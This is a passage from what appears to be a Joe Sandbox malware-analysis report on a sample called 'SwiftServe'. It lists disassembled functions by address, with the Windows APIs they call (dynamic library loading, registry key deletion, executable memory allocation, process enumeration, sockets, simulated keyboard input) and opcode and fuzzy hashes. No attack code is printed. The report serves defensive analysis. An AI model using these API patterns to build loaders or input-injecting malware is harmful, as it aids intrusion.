kernel32.dll, xrefs: 00E34B80

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 9fa725a1bbb9f22c60c441eafc55d4d82c75318e12ae4d05bd2765d0bfc0a9ef
Instruction ID: d4b2f69a6b4e49bad8f9e13822015a04686bba762bf5c487a61d232f841a67f9
Opcode Fuzzy Hash: 9fa725a1bbb9f22c60c441eafc55d4d82c75318e12ae4d05bd2765d0bfc0a9ef
Instruction Fuzzy Hash: 51D017B05107128FD7209F36DC1CB47BAE8AF04395F51A82AD4D6F2690E670F880CA50

Function 00EA1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00EA1696), ref: 00EA1455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EA1467

Strings

advapi32.dll, xrefs: 00EA1450
RegDeleteKeyExW, xrefs: 00EA1461

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 95ec2d0768f6dd65dcd189773b8772edd2c710b75e4a26c44243298bd9c9d699
Instruction ID: 67bf6c73ca8ad3531cc2791886ce9c0f6b3a4c187ae7eefa33101d879e84c2a9
Opcode Fuzzy Hash: 95ec2d0768f6dd65dcd189773b8772edd2c710b75e4a26c44243298bd9c9d699
Instruction Fuzzy Hash: D9D012355517138FD7205F79C80860776E4AF0A3D5F11D96AD4E5F6260D670E4C0C650

Function 00E355F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E35E3D), ref: 00E355FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E35610

Strings

kernel32.dll, xrefs: 00E355F9
GetNativeSystemInfo, xrefs: 00E3560A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 08fe4bbdcd6fbd7f63837daaa54817c868e05e9dbc093fd33737ed1534cdb59a
Instruction ID: 0487987f76e06cbbee9e8e2b851adff49624dd6a28c9f7973fa4cb9ee16d4295
Opcode Fuzzy Hash: 08fe4bbdcd6fbd7f63837daaa54817c868e05e9dbc093fd33737ed1534cdb59a
Instruction Fuzzy Hash: 3DD01775921B129FE7209F36C8096577AE8AF44399F11A82AD496F2291E670E880CA90

Function 00E997CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E993DE,?,00EB0980), ref: 00E997D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E997EA

Strings

kernel32.dll, xrefs: 00E997D3
GetModuleHandleExW, xrefs: 00E997E4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 0ce0cc2c08894df4397ec3182b1eff212e76b87a2db67bc5424f0df1bde41c84
Instruction ID: 3fab2e8cec98b6e86aeeecd811f28832bb2dea301a4e4f44157552a3aba79935
Opcode Fuzzy Hash: 0ce0cc2c08894df4397ec3182b1eff212e76b87a2db67bc5424f0df1bde41c84
Instruction Fuzzy Hash: E7D01270520713CFD7205F79D988647B6D4BF44395F11982ED495F2150EF70D4C0C661

Function 00E77D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c76c9e90c5e6f8490231f28eb33775794e0ab7ebbdaf4ae2c7b582fedb33d63
Instruction ID: 04a40f4d3554ecea2157535afcc1ea559052f9bca0bb888f5bb16027e5717794
Opcode Fuzzy Hash: 2c76c9e90c5e6f8490231f28eb33775794e0ab7ebbdaf4ae2c7b582fedb33d63
Instruction Fuzzy Hash: 28C18074A00216EFDB14CF94C988EAEBBF5FF48714B119598E849EB251DB31ED81CB90

Function 00E9E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00E9E7A7
CharLowerBuffW.USER32(?,?), ref: 00E9E7EA

Part of subcall function 00E9DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E9DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E9E9EA
_memmove.LIBCMT ref: 00E9E9FD

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 1832f1972f0c05ba080a473d1d19f07d22771d9103b4020ba07affc021e382ac
Instruction ID: 15d7a86d8c3253a9e41be6667c973b515ad833da4bc107b81c5d584b41195516
Opcode Fuzzy Hash: 1832f1972f0c05ba080a473d1d19f07d22771d9103b4020ba07affc021e382ac
Instruction Fuzzy Hash: 15C17A71A083019FCB14DF28C48096ABBE4FF88718F14996EF999AB351D731E945CF82

Function 00E9877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E987AD
CoUninitialize.OLE32 ref: 00E987B8

Part of subcall function 00EADF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00E98A0E,?,00000000), ref: 00EADF71

VariantInit.OLEAUT32(?), ref: 00E987C3
VariantClear.OLEAUT32(?), ref: 00E98A94

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 0171daaa32e0852395b282ed467ab5c7a3bac45296e92cc1f493c3b175de70c8
Instruction ID: 2544a2394a02ef57309558c9b3054642897f9f2d1d1a3bf5530b4def3f5e96f2
Opcode Fuzzy Hash: 0171daaa32e0852395b282ed467ab5c7a3bac45296e92cc1f493c3b175de70c8
Instruction Fuzzy Hash: 19A17B75204B119FCB10DF24D581B2AB7E5BF89314F149949F999AB3A2CB30FD04CB92

Function 00E7814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00EB3C4C,?), ref: 00E78308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00EB3C4C,?), ref: 00E78320
CLSIDFromProgID.OLE32(?,?,00000000,00EB0988,000000FF,?,00000000,00000800,00000000,?,00EB3C4C,?), ref: 00E78345
_memcmp.LIBCMT ref: 00E78366

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 23bb71bd4f8d668fd6f1d1ae471c029e6e2c6ec867daf4c65e3d77f5213d685a
Instruction ID: e5a8c83d939b0c4e27bd8863fdcce12462da9f0229b4ce37ba85c9468f3a7d9b
Opcode Fuzzy Hash: 23bb71bd4f8d668fd6f1d1ae471c029e6e2c6ec867daf4c65e3d77f5213d685a
Instruction Fuzzy Hash: F1810B71A00109EFCB04DF94C988EEEB7B9FF89315F208599E519BB250DB71AE05CB60

Function 00E7749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E774AC
SysAllocString.OLEAUT32(00000000), ref: 00E77555
VariantCopy.OLEAUT32 ref: 00E77584
VariantClear.OLEAUT32(?), ref: 00E775AB

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: e312d32d207cfec26d03158a0c994df1b136a5b481c0f856f44f3d34024e425d
Instruction ID: 9f29c6d75e33119f1d0a04a62147469ee86c5f5f255a35c25dfe7368e640664d
Opcode Fuzzy Hash: e312d32d207cfec26d03158a0c994df1b136a5b481c0f856f44f3d34024e425d
Instruction Fuzzy Hash: 1D51A730708B019BDB209FB99895A7EB3E5AF45314B20F81FE5DEF72A5EB7098408705

Function 00E9F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E9F526
Process32FirstW.KERNEL32(00000000,?), ref: 00E9F534

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Process32NextW.KERNEL32(00000000,?), ref: 00E9F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E9F603

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 615fbab505a08bea3ee81aeebe4061dad7604eb43f4e3981f21c6e0f6560d84b
Instruction ID: e2a20413632070446f3dcc80864e8156865e598b0e161dca9cee637cb1b065f9
Opcode Fuzzy Hash: 615fbab505a08bea3ee81aeebe4061dad7604eb43f4e3981f21c6e0f6560d84b
Instruction Fuzzy Hash: 2F518FB15043119FD710EF24EC85E6BBBE8EF94700F10592DF595E72A1EB70A904CB92

Function 00E4492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E449C0
__flush.LIBCMT ref: 00E449E0
__write.LIBCMT ref: 00E44A13
__flsbuf.LIBCMT ref: 00E44A41

Part of subcall function 00E48D58: __getptd_noexit.LIBCMT ref: 00E48D58

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
Instruction ID: 68fa82b2d5c597cae1869f18bc1957d5697610cec569805b2190c2fc581039ff
Opcode Fuzzy Hash: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
Instruction Fuzzy Hash: 4B41D8B170070A9BDF28CE69E880BAF77A5AF80364B24913DE555E76C0E770DE40AB44

Function 00E7A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E7A68A
__itow.LIBCMT ref: 00E7A6BB

Part of subcall function 00E7A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E7A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E7A724
__itow.LIBCMT ref: 00E7A77B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 19d0f79e28a6ff737ae3e456a356bdd48709dcc93fe47e62228bc1eabefffc71
Instruction ID: 96129d9b114fd84ccd7715c95fe3830a3602f371949449de49bbb557267ee46e
Opcode Fuzzy Hash: 19d0f79e28a6ff737ae3e456a356bdd48709dcc93fe47e62228bc1eabefffc71
Instruction Fuzzy Hash: 08419474A00309ABDF15EF54D849BEE7FF9EF84750F08506AF909B3281DB709944CAA2

Function 00E97095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00E970BC
WSAGetLastError.WSOCK32(00000000), ref: 00E970CC

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E97130
WSAGetLastError.WSOCK32(00000000), ref: 00E9713C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: f2cbb2a0fb03309ed5c416911b37ec6751b934c44ddffe3df6a5ac54aed6e2e8
Instruction ID: ab093cbeeaa1a908f81f5393b3189c74e33f6fc098fa9a4d46748d9d492f8bf5
Opcode Fuzzy Hash: f2cbb2a0fb03309ed5c416911b37ec6751b934c44ddffe3df6a5ac54aed6e2e8
Instruction Fuzzy Hash: 3B41BFB1750210AFEB24AF25EC86F2A7BE49F04B14F049558FA59BB3D2DB709D008B91

Function 00E96B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EB0980), ref: 00E96B92
_strlen.LIBCMT ref: 00E96BC4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 382f238330516fc07a8e661229be614db107876e92431b6b11ab8ac09468cc01
Instruction ID: 236cbcb4ebe68d5215751ce9c680b496a712108063a79099a876dc0b426b4e37
Opcode Fuzzy Hash: 382f238330516fc07a8e661229be614db107876e92431b6b11ab8ac09468cc01
Instruction Fuzzy Hash: 4C41B371A00118ABCB14FBB4DD95EAEB7E9EF54310F14A155F81ABB292EB30AD41C790

Function 00EA8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EA8F03

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 1ff95dcd17e6f16523688a0a955d047a57f952926689cc1ba1feeb4e4f3725ea
Instruction ID: fac450b6ee36736460f2c0246f9e18926491a4eaa32f297cd3fe11384de3a997
Opcode Fuzzy Hash: 1ff95dcd17e6f16523688a0a955d047a57f952926689cc1ba1feeb4e4f3725ea
Instruction Fuzzy Hash: C031D03870010EEEEF248A18CE85BA977A6EB0F324F146502FA51FE1A1DF70F950CA51

Function 00EAB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00EAB1D2
GetWindowRect.USER32(?,?), ref: 00EAB248
PtInRect.USER32(?,?,00EAC6BC), ref: 00EAB258
MessageBeep.USER32(00000000), ref: 00EAB2C9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b236c24a749a9afc17928fc13f5143db5e58c62e151931a4b5a3cfff556481ed
Instruction ID: c61e9f63ea0f630bdfa5af0f846018e45a13ebef355eba72b22a998b4a809457
Opcode Fuzzy Hash: b236c24a749a9afc17928fc13f5143db5e58c62e151931a4b5a3cfff556481ed
Instruction Fuzzy Hash: 02418D30A04159DFCB15CF59C884BAD7BF5FF4A314F1495AAE858AF266D330B845CBA0

Function 00E812D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E81326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00E81342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E813A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E813FA

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a6e1735420f500ff40f5d63839c6cdb9345742b7fa1dcdb1dca854aaa2601776
Instruction ID: 7656c8e12dcf96635a87dcc8ab63ba5f96790329ad92c67933d1045997383fe9
Opcode Fuzzy Hash: a6e1735420f500ff40f5d63839c6cdb9345742b7fa1dcdb1dca854aaa2601776
Instruction Fuzzy Hash: 57317A30940208AEFF31AA258C05BFE7BADAB45324F04A39AF09C72AD1C3749D479B51

Function 00E81410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E81465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00E81481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00E814E0
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E81532

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9562e822346a2de2793c2fe66e60aae91b26ea0576f36b84de3052a4f311c84a
Instruction ID: 8e36a981cff6960367dbbd6d3b18e91981a5c4013e194a25fd91324f8b18b11b
Opcode Fuzzy Hash: 9562e822346a2de2793c2fe66e60aae91b26ea0576f36b84de3052a4f311c84a
